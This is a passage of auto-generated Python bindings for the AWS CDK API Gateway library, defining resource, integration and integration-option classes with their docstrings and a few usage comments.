:param max_age: The Access-Control-Max-Age response header indicates how long the results of a preflight request (that is, the information contained in the Access-Control-Allow-Methods and Access-Control-Allow-Headers headers) can be cached. To disable caching altogether, use ``disableCache: true``. Default: - browser-specific (see reference)
:param status_code: Specifies the response status code returned from the OPTIONS method. Default: 204
return
:return: a ``Method`` object
see
:see: https://developer.mozilla.org/en-US/docs/Web/HTTP/CORS
"""
...
@jsii.member(jsii_name="addMethod")
def add_method(self, http_method: str, target: typing.Optional["Integration"]=None, *, api_key_required: typing.Optional[bool]=None, authorization_type: typing.Optional["AuthorizationType"]=None, authorizer: typing.Optional["IAuthorizer"]=None, method_responses: typing.Optional[typing.List["MethodResponse"]]=None, operation_name: typing.Optional[str]=None, request_models: typing.Optional[typing.Mapping[str,"IModel"]]=None, request_parameters: typing.Optional[typing.Mapping[str,bool]]=None, request_validator: typing.Optional["IRequestValidator"]=None) -> "Method":
"""Defines a new method for this resource.
:param http_method: The HTTP method.
:param target: The target backend integration for this method.
:param options: Method options, such as authentication.
:param api_key_required: Indicates whether the method requires clients to submit a valid API key. Default: false
:param authorization_type: Method authorization. Default: None (open access)
:param authorizer: If ``authorizationType`` is ``Custom``, this specifies the ID of the method authorizer resource.
:param method_responses: The responses that can be sent to the client who calls the method. Default: None. This property is not required, but if these are not supplied for a Lambda proxy integration, the Lambda function must return a value of the correct format for the integration response to be correctly mapped to a response to the client.
:param operation_name: A friendly operation name for the method. For example, you can assign the OperationName of ListPets for the GET /pets method.
:param request_models: The resources that are used for the response's content type. Specify request models as key-value pairs (string-to-string mapping), with a content type as the key and a Model resource name as the value.
:param request_parameters: The request parameters that API Gateway accepts. Specify request parameters as key-value pairs (string-to-Boolean mapping), with a source as the key and a Boolean as the value. The Boolean specifies whether a parameter is required. A source must match the format method.request.location.name, where the location is querystring, path, or header, and name is a valid, unique parameter name. Default: None
:param request_validator: The ID of the associated request validator.
return
:return: The newly created ``Method`` object.
"""
...
@jsii.member(jsii_name="addProxy")
def add_proxy(self, *, any_method: typing.Optional[bool]=None, default_cors_preflight_options: typing.Optional["CorsOptions"]=None, default_integration: typing.Optional["Integration"]=None, default_method_options: typing.Optional["MethodOptions"]=None) -> "ProxyResource":
"""Adds a greedy proxy resource ("{proxy+}") and an ANY method to this route.
:param options: Default integration and method options.
:param any_method: Adds an "ANY" method to this resource. If set to ``false``, you will have to explicitly add methods to this resource after it's created. Default: true
:param default_cors_preflight_options: Adds a CORS preflight OPTIONS method to this resource and all child resources. You can add CORS at the resource-level using ``addCorsPreflight``. Default: - CORS is disabled
:param default_integration: An integration to use as a default for all methods created within this API unless an integration is specified. Default: - Inherited from parent.
:param default_method_options: Method options to use as a default for all methods created within this API unless custom options are specified. Default: - Inherited from parent.
"""
...
@jsii.member(jsii_name="addResource")
def add_resource(self, path_part: str, *, default_cors_preflight_options: typing.Optional["CorsOptions"]=None, default_integration: typing.Optional["Integration"]=None, default_method_options: typing.Optional["MethodOptions"]=None) -> "Resource":
"""Defines a new child resource where this resource is the parent.
:param path_part: The path part for the child resource.
:param options: Resource options.
:param default_cors_preflight_options: Adds a CORS preflight OPTIONS method to this resource and all child resources. You can add CORS at the resource-level using ``addCorsPreflight``. Default: - CORS is disabled
:param default_integration: An integration to use as a default for all methods created within this API unless an integration is specified. Default: - Inherited from parent.
:param default_method_options: Method options to use as a default for all methods created within this API unless custom options are specified. Default: - Inherited from parent.
return
:return: A Resource object
"""
...
@jsii.member(jsii_name="getResource")
def get_resource(self, path_part: str) -> typing.Optional["IResource"]:
"""Retrieves a child resource by path part.
:param path_part: The path part of the child resource.
return
:return: the child resource or undefined if not found
"""
...
@jsii.member(jsii_name="resourceForPath")
def resource_for_path(self, path: str) -> "Resource":
"""Gets or create all resources leading up to the specified path.
- Path may only start with "/" if this method is called on the root resource.
- All resources are created using default options.
:param path: The relative path.
return
:return: a new or existing resource.
"""
...
class _IResourceProxy(jsii.proxy_for(aws_cdk.core.IResource)):
__jsii_type__ = "@aws-cdk/aws-apigateway.IResource"
@property
@jsii.member(jsii_name="path")
def path(self) -> str:
"""The full path of this resuorce."""
return jsii.get(self, "path")
@property
@jsii.member(jsii_name="resourceId")
def resource_id(self) -> str:
"""The ID of the resource.
attribute:
:attribute:: true
"""
return jsii.get(self, "resourceId")
@property
@jsii.member(jsii_name="restApi")
def rest_api(self) -> "RestApi":
"""The rest API that this resource is part of.
The reason we need the RestApi object itself and not just the ID is that the model
is being tracked by the top-level RestApi object for the purpose of calculating its
hash to determine the ID of the deployment. This allows us to automatically update
the deployment when the model of the REST API changes.
"""
return jsii.get(self, "restApi")
@property
@jsii.member(jsii_name="defaultCorsPreflightOptions")
def default_cors_preflight_options(self) -> typing.Optional["CorsOptions"]:
"""Default options for CORS preflight OPTIONS method."""
return jsii.get(self, "defaultCorsPreflightOptions")
@property
@jsii.member(jsii_name="defaultIntegration")
def default_integration(self) -> typing.Optional["Integration"]:
"""An integration to use as a default for all methods created within this API unless an integration is specified."""
return jsii.get(self, "defaultIntegration")
@property
@jsii.member(jsii_name="defaultMethodOptions")
def default_method_options(self) -> typing.Optional["MethodOptions"]:
"""Method options to use as a default for all methods created within this API unless custom options are specified."""
return jsii.get(self, "defaultMethodOptions")
@property
@jsii.member(jsii_name="parentResource")
def parent_resource(self) -> typing.Optional["IResource"]:
"""The parent of this resource or undefined for the root resource."""
return jsii.get(self, "parentResource")
@jsii.member(jsii_name="addCorsPreflight")
def add_cors_preflight(self, *, allow_origins: typing.List[str], allow_credentials: typing.Optional[bool]=None, allow_headers: typing.Optional[typing.List[str]]=None, allow_methods: typing.Optional[typing.List[str]]=None, disable_cache: typing.Optional[bool]=None, expose_headers: typing.Optional[typing.List[str]]=None, max_age: typing.Optional[aws_cdk.core.Duration]=None, status_code: typing.Optional[jsii.Number]=None) -> "Method":
"""Adds an OPTIONS method to this resource which responds to Cross-Origin Resource Sharing (CORS) preflight requests.
Cross-Origin Resource Sharing (CORS) is a mechanism that uses additional
HTTP headers to tell browsers to give a web application running at one
origin, access to selected resources from a different origin. A web
application executes a cross-origin HTTP request when it requests a
resource that has a different origin (domain, protocol, or port) from its
own.
:param options: CORS options.
:param allow_origins: Specifies the list of origins that are allowed to make requests to this resource. If you wish to allow all origins, specify ``Cors.ALL_ORIGINS`` or ``[ * ]``. Responses will include the ``Access-Control-Allow-Origin`` response header. If ``Cors.ALL_ORIGINS`` is specified, the ``Vary: Origin`` response header will also be included.
:param allow_credentials: The Access-Control-Allow-Credentials response header tells browsers whether to expose the response to frontend JavaScript code when the request's credentials mode (Request.credentials) is "include". When a request's credentials mode (Request.credentials) is "include", browsers will only expose the response to frontend JavaScript code if the Access-Control-Allow-Credentials value is true. Credentials are cookies, authorization headers or TLS client certificates. Default: false
:param allow_headers: The Access-Control-Allow-Headers response header is used in response to a preflight request which includes the Access-Control-Request-Headers to indicate which HTTP headers can be used during the actual request. Default: Cors.DEFAULT_HEADERS
:param allow_methods: The Access-Control-Allow-Methods response header specifies the method or methods allowed when accessing the resource in response to a preflight request. If ``ANY`` is specified, it will be expanded to ``Cors.ALL_METHODS``. Default: Cors.ALL_METHODS
:param disable_cache: Sets Access-Control-Max-Age to -1, which means that caching is disabled. This option cannot be used with ``maxAge``. Default: - cache is enabled
:param expose_headers: The Access-Control-Expose-Headers response header indicates which headers can be exposed as part of the response by listing their names. If you want clients to be able to access other headers, you have to list them using the Access-Control-Expose-Headers header. Default: - only the 6 CORS-safelisted response headers are exposed: Cache-Control, Content-Language, Content-Type, Expires, Last-Modified, Pragma
:param max_age: The Access-Control-Max-Age response header indicates how long the results of a preflight request (that is, the information contained in the Access-Control-Allow-Methods and Access-Control-Allow-Headers headers) can be cached. To disable caching altogether, use ``disableCache: true``. Default: - browser-specific (see reference)
:param status_code: Specifies the response status code returned from the OPTIONS method. Default: 204
return
:return: a ``Method`` object
see
:see: https://developer.mozilla.org/en-US/docs/Web/HTTP/CORS
"""
options = CorsOptions(allow_origins=allow_origins, allow_credentials=allow_credentials, allow_headers=allow_headers, allow_methods=allow_methods, disable_cache=disable_cache, expose_headers=expose_headers, max_age=max_age, status_code=status_code)
return jsii.invoke(self, "addCorsPreflight", [options])
@jsii.member(jsii_name="addMethod")
def add_method(self, http_method: str, target: typing.Optional["Integration"]=None, *, api_key_required: typing.Optional[bool]=None, authorization_type: typing.Optional["AuthorizationType"]=None, authorizer: typing.Optional["IAuthorizer"]=None, method_responses: typing.Optional[typing.List["MethodResponse"]]=None, operation_name: typing.Optional[str]=None, request_models: typing.Optional[typing.Mapping[str,"IModel"]]=None, request_parameters: typing.Optional[typing.Mapping[str,bool]]=None, request_validator: typing.Optional["IRequestValidator"]=None) -> "Method":
"""Defines a new method for this resource.
:param http_method: The HTTP method.
:param target: The target backend integration for this method.
:param options: Method options, such as authentication.
:param api_key_required: Indicates whether the method requires clients to submit a valid API key. Default: false
:param authorization_type: Method authorization. Default: None (open access)
:param authorizer: If ``authorizationType`` is ``Custom``, this specifies the ID of the method authorizer resource.
:param method_responses: The responses that can be sent to the client who calls the method. Default: None. This property is not required, but if these are not supplied for a Lambda proxy integration, the Lambda function must return a value of the correct format for the integration response to be correctly mapped to a response to the client.
:param operation_name: A friendly operation name for the method. For example, you can assign the OperationName of ListPets for the GET /pets method.
:param request_models: The resources that are used for the response's content type. Specify request models as key-value pairs (string-to-string mapping), with a content type as the key and a Model resource name as the value.
:param request_parameters: The request parameters that API Gateway accepts. Specify request parameters as key-value pairs (string-to-Boolean mapping), with a source as the key and a Boolean as the value. The Boolean specifies whether a parameter is required. A source must match the format method.request.location.name, where the location is querystring, path, or header, and name is a valid, unique parameter name. Default: None
:param request_validator: The ID of the associated request validator.
return
:return: The newly created ``Method`` object.
"""
options = MethodOptions(api_key_required=api_key_required, authorization_type=authorization_type, authorizer=authorizer, method_responses=method_responses, operation_name=operation_name, request_models=request_models, request_parameters=request_parameters, request_validator=request_validator)
return jsii.invoke(self, "addMethod", [http_method, target, options])
@jsii.member(jsii_name="addProxy")
def add_proxy(self, *, any_method: typing.Optional[bool]=None, default_cors_preflight_options: typing.Optional["CorsOptions"]=None, default_integration: typing.Optional["Integration"]=None, default_method_options: typing.Optional["MethodOptions"]=None) -> "ProxyResource":
"""Adds a greedy proxy resource ("{proxy+}") and an ANY method to this route.
:param options: Default integration and method options.
:param any_method: Adds an "ANY" method to this resource. If set to ``false``, you will have to explicitly add methods to this resource after it's created. Default: true
:param default_cors_preflight_options: Adds a CORS preflight OPTIONS method to this resource and all child resources. You can add CORS at the resource-level using ``addCorsPreflight``. Default: - CORS is disabled
:param default_integration: An integration to use as a default for all methods created within this API unless an integration is specified. Default: - Inherited from parent.
:param default_method_options: Method options to use as a default for all methods created within this API unless custom options are specified. Default: - Inherited from parent.
"""
options = ProxyResourceOptions(any_method=any_method, default_cors_preflight_options=default_cors_preflight_options, default_integration=default_integration, default_method_options=default_method_options)
return jsii.invoke(self, "addProxy", [options])
@jsii.member(jsii_name="addResource")
def add_resource(self, path_part: str, *, default_cors_preflight_options: typing.Optional["CorsOptions"]=None, default_integration: typing.Optional["Integration"]=None, default_method_options: typing.Optional["MethodOptions"]=None) -> "Resource":
"""Defines a new child resource where this resource is the parent.
:param path_part: The path part for the child resource.
:param options: Resource options.
:param default_cors_preflight_options: Adds a CORS preflight OPTIONS method to this resource and all child resources. You can add CORS at the resource-level using ``addCorsPreflight``. Default: - CORS is disabled
:param default_integration: An integration to use as a default for all methods created within this API unless an integration is specified. Default: - Inherited from parent.
:param default_method_options: Method options to use as a default for all methods created within this API unless custom options are specified. Default: - Inherited from parent.
return
:return: A Resource object
"""
options = ResourceOptions(default_cors_preflight_options=default_cors_preflight_options, default_integration=default_integration, default_method_options=default_method_options)
return jsii.invoke(self, "addResource", [path_part, options])
@jsii.member(jsii_name="getResource")
def get_resource(self, path_part: str) -> typing.Optional["IResource"]:
"""Retrieves a child resource by path part.
:param path_part: The path part of the child resource.
return
:return: the child resource or undefined if not found
"""
return jsii.invoke(self, "getResource", [path_part])
@jsii.member(jsii_name="resourceForPath")
def resource_for_path(self, path: str) -> "Resource":
"""Gets or create all resources leading up to the specified path.
- Path may only start with "/" if this method is called on the root resource.
- All resources are created using default options.
:param path: The relative path.
return
:return: a new or existing resource.
"""
return jsii.invoke(self, "resourceForPath", [path])
@jsii.interface(jsii_type="@aws-cdk/aws-apigateway.IRestApi")
class IRestApi(aws_cdk.core.IResource, jsii.compat.Protocol):
@staticmethod
def __jsii_proxy_class__():
return _IRestApiProxy
@property
@jsii.member(jsii_name="restApiId")
def rest_api_id(self) -> str:
"""The ID of this API Gateway RestApi.
attribute:
:attribute:: true
"""
...
class _IRestApiProxy(jsii.proxy_for(aws_cdk.core.IResource)):
__jsii_type__ = "@aws-cdk/aws-apigateway.IRestApi"
@property
@jsii.member(jsii_name="restApiId")
def rest_api_id(self) -> str:
"""The ID of this API Gateway RestApi.
attribute:
:attribute:: true
"""
return jsii.get(self, "restApiId")
class Integration(metaclass=jsii.JSIIMeta, jsii_type="@aws-cdk/aws-apigateway.Integration"):
"""Base class for backend integrations for an API Gateway method.
Use one of the concrete classes such as ``MockIntegration``, ``AwsIntegration``, ``LambdaIntegration``,
or implement your own by specifying the set of props.
"""
def __init__(self, *, type: "IntegrationType", integration_http_method: typing.Optional[str]=None, options: typing.Optional["IntegrationOptions"]=None, uri: typing.Any=None) -> None:
"""
:param props: -
:param type: Specifies an API method integration type.
:param integration_http_method: The integration's HTTP method type. Required unless you use a MOCK integration.
:param options: Integration options.
:param uri: The Uniform Resource Identifier (URI) for the integration. - If you specify HTTP for the ``type`` property, specify the API endpoint URL. - If you specify MOCK for the ``type`` property, don't specify this property. - If you specify AWS for the ``type`` property, specify an AWS service that follows this form: ``arn:aws:apigateway:region:subdomain.service|service:path|action/service_api.`` For example, a Lambda function URI follows this form: arn:aws:apigateway:region:lambda:path/path. The path is usually in the form /2015-03-31/functions/LambdaFunctionARN/invocations.
"""
props = IntegrationProps(type=type, integration_http_method=integration_http_method, options=options, uri=uri)
jsii.create(Integration, self, [props])
@jsii.member(jsii_name="bind")
def bind(self, _method: "Method") -> None:
"""Can be overridden by subclasses to allow the integration to interact with the method being integrated, access the REST API object, method ARNs, etc.
:param _method: -
"""
return jsii.invoke(self, "bind", [_method])
class AwsIntegration(Integration, metaclass=jsii.JSIIMeta, jsii_type="@aws-cdk/aws-apigateway.AwsIntegration"):
"""This type of integration lets an API expose AWS service actions.
It is
intended for calling all AWS service actions, but is not recommended for
calling a Lambda function, because the Lambda custom integration is a legacy
technology.
"""
def __init__(self, *, service: str, action: typing.Optional[str]=None, action_parameters: typing.Optional[typing.Mapping[str,str]]=None, integration_http_method: typing.Optional[str]=None, options: typing.Optional["IntegrationOptions"]=None, path: typing.Optional[str]=None, proxy: typing.Optional[bool]=None, subdomain: typing.Optional[str]=None) -> None:
"""
:param props: -
:param service: The name of the integrated AWS service (e.g. ``s3``).
:param action: The AWS action to perform in the integration. Use ``actionParams`` to specify key-value params for the action. Mutually exclusive with ``path``.
:param action_parameters: Parameters for the action. ``action`` must be set, and ``path`` must be undefined. The action params will be URL encoded.
:param integration_http_method: The integration's HTTP method type. Default: POST
:param options: Integration options, such as content handling, request/response mapping, etc.
:param path: The path to use for path-based APIs. For example, for S3 GET, you can set path to ``bucket/key``. For Lambda, you can set path to ``2015-03-31/functions/${function-arn}/invocations``. Mutually exclusive with the ``action`` option.
:param proxy: Use AWS_PROXY integration. Default: false
:param subdomain: A designated subdomain supported by certain AWS services for fast host-name lookup.
"""
props = AwsIntegrationProps(service=service, action=action, action_parameters=action_parameters, integration_http_method=integration_http_method, options=options, path=path, proxy=proxy, subdomain=subdomain)
jsii.create(AwsIntegration, self, [props])
@jsii.member(jsii_name="bind")
def bind(self, method: "Method") -> None:
"""Can be overridden by subclasses to allow the integration to interact with the method being integrated, access the REST API object, method ARNs, etc.
:param method: -
"""
return jsii.invoke(self, "bind", [method])
class HttpIntegration(Integration, metaclass=jsii.JSIIMeta, jsii_type="@aws-cdk/aws-apigateway.HttpIntegration"):
"""You can integrate an API method with an HTTP endpoint using the HTTP proxy integration or the HTTP custom integration,.
With the proxy integration, the setup is simple. You only need to set the
HTTP method and the HTTP endpoint URI, according to the backend requirements,
if you are not concerned with content encoding or caching.
With the custom integration, the setup is more involved. In addition to the
proxy integration setup steps, you need to specify how the incoming request
data is mapped to the integration request and how the resulting integration
response data is mapped to the method response.
"""
def __init__(self, url: str, *, http_method: typing.Optional[str]=None, options: typing.Optional["IntegrationOptions"]=None, proxy: typing.Optional[bool]=None) -> None:
"""
:param url: -
:param props: -
:param http_method: HTTP method to use when invoking the backend URL. Default: GET
:param options: Integration options, such as request/response mapping, content handling, etc. Default: defaults based on ``IntegrationOptions`` defaults
:param proxy: Determines whether to use proxy integration or custom integration. Default: true
"""
props = HttpIntegrationProps(http_method=http_method, options=options, proxy=proxy)
jsii.create(HttpIntegration, self, [url, props])
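# Usage sketch (illustrative; the URL and ``orders`` resource are
# hypothetical): proxy integration is the default, so only the endpoint is
# required.
#
#   orders.add_method("GET", HttpIntegration("https://example.com/orders"))
#
# For a custom (non-proxy) integration, pass ``proxy=False`` and supply the
# request/response mappings via ``options``.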
@jsii.data_type(jsii_type="@aws-cdk/aws-apigateway.IntegrationOptions", jsii_struct_bases=[], name_mapping={'cache_key_parameters': 'cacheKeyParameters', 'cache_namespace': 'cacheNamespace', 'connection_type': 'connectionType', 'content_handling': 'contentHandling', 'credentials_passthrough': 'credentialsPassthrough', 'credentials_role': 'credentialsRole', 'integration_responses': 'integrationResponses', 'passthrough_behavior': 'passthroughBehavior', 'request_parameters': 'requestParameters', 'request_templates': 'requestTemplates', 'vpc_link': 'vpcLink'})
class IntegrationOptions():
def __init__(self, *, cache_key_parameters: typing.Optional[typing.List[str]]=None, cache_namespace: typing.Optional[str]=None, connection_type: typing.Optional["ConnectionType"]=None, content_handling: typing.Optional["ContentHandling"]=None, credentials_passthrough: typing.Optional[bool]=None, credentials_role: typing.Optional[aws_cdk.aws_iam.IRole]=None, integration_responses: typing.Optional[typing.List["IntegrationResponse"]]=None, passthrough_behavior: typing.Optional["PassthroughBehavior"]=None, request_parameters: typing.Optional[typing.Mapping[str,str]]=None, request_templates: typing.Optional[typing.Mapping[str,str]]=None, vpc_link: typing.Optional["VpcLink"]=None):
"""
:param cache_key_parameters: A list of request parameters whose values are to be cached. It determines request parameters that will make it into the cache key.
:param cache_namespace: An API-specific tag group of related cached parameters.
:param connection_type: The type of network connection to the integration endpoint. Default: ConnectionType.Internet
:param content_handling: Specifies how to handle request payload content type conversions. Default: none; if this property isn't defined, the request payload is passed through from the method request to the integration request without modification, provided that the ``passthroughBehavior`` property is configured to support payload pass-through.
:param credentials_passthrough: Requires that the caller's identity be passed through from the request. Default: Caller identity is not passed through
:param credentials_role: An IAM role that API Gateway assumes. Mutually exclusive with ``credentialsPassthrough``. Default: A role is not assumed
:param integration_responses: The response that API Gateway provides after a method's backend completes processing a request. API Gateway intercepts the response from the backend so that you can control how API Gateway surfaces backend responses. For example, you can map the backend status codes to codes that you define.
:param passthrough_behavior: Specifies the pass-through behavior for incoming requests based on the Content-Type header in the request, and the available mapping templates specified as the requestTemplates property on the Integration resource. There are three valid values: WHEN_NO_MATCH, WHEN_NO_TEMPLATES, and NEVER.
:param request_parameters: The request parameters that API Gateway sends with the backend request. Specify request parameters as key-value pairs (string-to-string mappings), with a destination as the key and a source as the value. Specify the destination by using the following pattern integration.request.location.name, where location is querystring, path, or header, and name is a valid, unique parameter name. The source must be an existing method request parameter or a static value. You must enclose static values in single quotation marks and pre-encode these values based on their destination in the request.
:param request_templates: A map of Apache Velocity templates that are applied on the request payload. The template that API Gateway uses is based on the value of the Content-Type header that's sent by the client. The content type value is the key, and the template is the value (specified as a string), such as the following snippet: { "application/json": "{\n "statusCode": "200"\n}" }
:param vpc_link: The VpcLink used for the integration. Required if connectionType is VPC_LINK.
"""
self._values = {
}
if cache_key_parameters is not None: self._values["cache_key_parameters"] = cache_key_parameters
if cache_namespace is not None: self._values["cache_namespace"] = cache_namespace
if connection_type is not None: self._values["connection_type"] = connection_type
if content_handling is not None: self._values["content_handling"] = content_handling
if credentials_passthrough is not None: self._values["credentials_passthrough"] = credentials_passthrough
if credentials_role is not None: self._values["credentials_role"] = credentials_role
if integration_responses is not None: self._values["integration_responses"] = integration_responses
if passthrough_behavior is not None: self._values["passthrough_behavior"] = passthrough_behavior
if request_parameters is not None: self._values["request_parameters"] = request_parameters
if request_templates is not None: self._values["request_templates"] = request_templates
if vpc_link is not None: self._values["vpc_link"] = vpc_link
@property
def cache_key_parameters(self) -> typing.Optional[typing.List[str]]:
"""A list of request parameters whose values are to be cached.
It determines
request parameters that will make it into the cache key.
"""
return self._values.get('cache_key_parameters')
@property
def cache_namespace(self) -> typing.Optional[str]:
"""An API-specific tag group of related cached parameters."""
return self._values.get('cache_namespace')
@property
def connection_type(self) -> typing.Optional["ConnectionType"]:
"""The type of network connection to the integration endpoint.
default
:default: ConnectionType.Internet
"""
return self._values.get('connection_type')
@property
def content_handling(self) -> typing.Optional["ContentHandling"]:
"""Specifies how to handle request payload content type conversions.
default
:default:
none; if this property isn't defined, the request payload is passed
through from the method request to the integration request without
modification, provided that the ``passthroughBehavior`` property is
configured to support payload pass-through.
"""
return self._values.get('content_handling')
@property
def credentials_passthrough(self) -> typing.Optional[bool]:
"""Requires that the caller's identity be passed through from the request.
default
:default: Caller identity is not passed through
"""
return self._values.get('credentials_passthrough')
@property
def credentials_role(self) -> typing.Optional[aws_cdk.aws_iam.IRole]:
"""An IAM role that API Gateway assumes.
Mutually exclusive with ``credentialsPassthrough``.
default
:default: A role is not assumed
"""
return self._values.get('credentials_role')
@property
def integration_responses(self) -> typing.Optional[typing.List["IntegrationResponse"]]:
"""The response that API Gateway provides after a method's backend completes processing a request.
API Gateway intercepts the response from the
backend so that you can control how API Gateway surfaces backend
responses. For example, you can map the backend status codes to codes
that you define.
"""
return self._values.get('integration_responses')
@property
def passthrough_behavior(self) -> typing.Optional["PassthroughBehavior"]:
"""Specifies the pass-through behavior for incoming requests based on the Content-Type header in the request, and the available mapping templates specified as the requestTemplates property on the Integration resource. There are three valid values: WHEN_NO_MATCH, WHEN_NO_TEMPLATES, and NEVER."""
return self._values.get('passthrough_behavior')
@property
def request_parameters(self) -> typing.Optional[typing.Mapping[str,str]]:
"""The request parameters that API Gateway sends with the backend request. Specify request parameters as key-value pairs (string-to-string mappings), with a destination as the key and a source as the value.
Specify the destination by using the following pattern
integration.request.location.name, where location is querystring, path,
or header, and name is a valid, unique parameter name.
The source must be an existing method request parameter or a static
value. You must enclose static values in single quotation marks and
pre-encode these values based on their destination in the request.
"""
return self._values.get('request_parameters')
@property
def request_templates(self) -> typing.Optional[typing.Mapping[str,str]]:
"""A map of Apache Velocity templates that are applied on the request payload.
The template that API Gateway uses is based on the value of the
Content-Type header that's sent by the client. The content type value is
the key, and the template is the value (specified as a string), such as
the following snippet:
{ "application/json": "{\n "statusCode": "200"\n}" }
see
:see: http://docs.aws.amazon.com/apigateway/latest/developerguide/api-gateway-mapping-template-reference.html
"""
return self._values.get('request_templates')
@property
def vpc_link(self) -> typing.Optional["VpcLink"]:
"""The VpcLink used for the integration. Required if connectionType is VPC_LINK."""
return self._values.get('vpc_link')
def __eq__(self, rhs) -> bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs) -> bool:
return not (rhs == self)
def __repr__(self) -> str:
return 'IntegrationOptions(%s)' % ', '.join(k + '=' + repr(v) for k, v in self._values.items())
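# Construction sketch (illustrative values): options shared by all
# integration types; here a mapping template is applied to JSON payloads and
# unmatched content types are rejected unless no templates are defined.
#
#   opts = IntegrationOptions(
#       passthrough_behavior=PassthroughBehavior.WHEN_NO_TEMPLATES,
#       request_templates={"application/json": '{ "statusCode": "200" }'},
#   )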
@jsii.data_type(jsii_type="@aws-cdk/aws-apigateway.IntegrationProps", jsii_struct_bases=[], name_mapping={'type': 'type', 'integration_http_method': 'integrationHttpMethod', 'options': 'options', 'uri': 'uri'})
class IntegrationProps():
def __init__(self, *, type: "IntegrationType", integration_http_method: typing.Optional[str]=None, options: typing.Optional["IntegrationOptions"]=None, uri: typing.Any=None):
"""
:param type: Specifies an API method integration type.
:param integration_http_method: The integration's HTTP method type. Required unless you use a MOCK integration.
:param options: Integration options.
:param uri: The Uniform Resource Identifier (URI) for the integration. - If you specify HTTP for the ``type`` property, specify the API endpoint URL. - If you specify MOCK for the ``type`` property, don't specify this property. - If you specify AWS for the ``type`` property, specify an AWS service that follows this form: ``arn:aws:apigateway:region:subdomain.service|service:path|action/service_api.`` For example, a Lambda function URI follows this form: arn:aws:apigateway:region:lambda:path/path. The path is usually in the form /2015-03-31/functions/LambdaFunctionARN/invocations.
"""
if isinstance(options, dict): options = IntegrationOptions(**options)
self._values = {
'type': type,
}
if integration_http_method is not None: self._values["integration_http_method"] = integration_http_method
if options is not None: self._values["options"] = options
if uri is not None: self._values["uri"] = uri
@property
def type(self) -> "IntegrationType":
"""Specifies an API method integration type."""
return self._values.get('type')
@property
def integration_http_method(self) -> typing.Optional[str]:
"""The integration's HTTP method type. Required unless you use a MOCK integration."""
return self._values.get('integration_http_method')
@property
def options(self) -> typing.Optional["IntegrationOptions"]:
"""Integration options."""
return self._values.get('options')
@property
def uri(self) -> typing.Any:
"""The Uniform Resource Identifier (URI) for the integration.
- If you specify HTTP for the ``type`` property, specify the API endpoint URL.
- If you specify MOCK for the ``type`` property, don't specify this property.
- If you specify AWS for the ``type`` property, specify an AWS service that
follows this form: ``arn:aws:apigateway:region:subdomain.service|service:path|action/service_api.``
For example, a Lambda function URI follows this form:
arn:aws:apigateway:region:lambda:path/path. The path is usually in the
form /2015-03-31/functions/LambdaFunctionARN/invocations.
see
:see: https://docs.aws.amazon.com/apigateway/api-reference/resource/integration/#uri
"""
return self._values.get('uri')
def __eq__(self, rhs) -> bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs) -> bool:
return not (rhs == self)
def __repr__(self) -> str:
return 'IntegrationProps(%s)' % ', '.join(k + '=' + repr(v) for k, v in self._values.items())
@jsii.data_type(jsii_type="@aws-cdk/aws-apigateway.IntegrationResponse", jsii_struct_bases=[], name_mapping={'status_code': 'statusCode', 'content_handling': 'contentHandling', 'response_parameters': 'responseParameters', 'response_templates': 'responseTemplates', 'selection_pattern': 'selectionPattern'})
class IntegrationResponse():
def __init__(self, *, status_code: str, content_handling: typing.Optional["ContentHandling"]=None, response_parameters: typing.Optional[typing.Mapping[str,str]]=None, response_templates: typing.Optional[typing.Mapping[str,str]]=None, selection_pattern: typing.Optional[str]=None):
"""
:param status_code: The status code that API Gateway uses to map the integration response to a MethodResponse status code.
:param content_handling: Specifies how to handle request payload content type conversions. Default: none; the request payload is passed through from the method request to the integration request without modification.
:param response_parameters: The response parameters from the backend response that API Gateway sends to the method response. Use the destination as the key and the source as the value: - The destination must be an existing response parameter in the MethodResponse property. - The source must be an existing method request parameter or a static value. You must enclose static values in single quotation marks and pre-encode these values based on the destination specified in the request.
:param response_templates: The templates that are used to transform the integration response body. Specify templates as key-value pairs, with a content type as the key and a template as the value.
:param selection_pattern: Specifies the regular expression (regex) pattern used to choose an integration response based on the response from the back end. For example, if the success response returns nothing and the error response returns some string, you could use the ``.+`` regex to match the error response. However, make sure that the error response does not contain any newline (``\n``) character in such cases. If the back end is an AWS Lambda function, the AWS Lambda function error header is matched. For all other HTTP and AWS back ends, the HTTP status code is matched.
"""
self._values = {
'status_code': status_code,
}
if content_handling is not None: self._values["content_handling"] = content_handling
if response_parameters is not None: self._values["response_parameters"] = response_parameters
if response_templates is not None: self._values["response_templates"] = response_templates
if selection_pattern is not None: self._values["selection_pattern"] = selection_pattern
@property
def status_code(self) -> str:
"""The status code that API Gateway uses to map the integration response to a MethodResponse status code."""
return self._values.get('status_code')
@property
def content_handling(self) -> typing.Optional["ContentHandling"]:
"""Specifies how to handle request payload content type conversions.
default
:default:
none; the request payload is passed through from the method
request to the integration request without modification.
"""
return self._values.get('content_handling')
@property
def response_parameters(self) -> typing.Optional[typing.Mapping[str,str]]:
"""The response parameters from the backend response that API Gateway sends to the method response.
Use the destination as the key and the source as the value:
- The destination must be an existing response parameter in the
MethodResponse property.
- The source must be an existing method request parameter or a static
value. You must enclose static values in single quotation marks and
pre-encode these values based on the destination specified in the
request.
see
:see: http://docs.aws.amazon.com/apigateway/latest/developerguide/request-response-data-mappings.html
"""
return self._values.get('response_parameters')
@property
def response_templates(self) -> typing.Optional[typing.Mapping[str,str]]:
"""The templates that are used to transform the integration response body. Specify templates as key-value pairs, with a content type as the key and a template as the value.
see
:see: http://docs.aws.amazon.com/apigateway/latest/developerguide/api-gateway-mapping-template-reference.html
"""
return self._values.get('response_templates')
@property
def selection_pattern(self) -> typing.Optional[str]:
"""Specifies the regular expression (regex) pattern used to choose an integration response based on the response from the back end.
For example, if the success response returns nothing and the error response returns some string, you
could use the ``.+`` regex to match the error response. However, make sure that the error response does not contain any
newline (``\n``) character in such cases. If the back end is an AWS Lambda function, the AWS Lambda function error
header is matched. For all other HTTP and AWS back ends, the HTTP status code is matched.
see
:see: https://docs.aws.amazon.com/apigateway/latest/developerguide/api-gateway-integration-settings-integration-response.html
"""
return self._values.get('selection_pattern')
def __eq__(self, rhs) -> bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs) -> bool:
return not (rhs == self)
def __repr__(self) -> str:
return 'IntegrationResponse(%s)' % ', '.join(k + '=' + repr(v) for k, v in self._values.items())
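# Construction sketch (illustrative values): maps any non-empty Lambda error
# message to a 500 method response.
#
#   error_response = IntegrationResponse(
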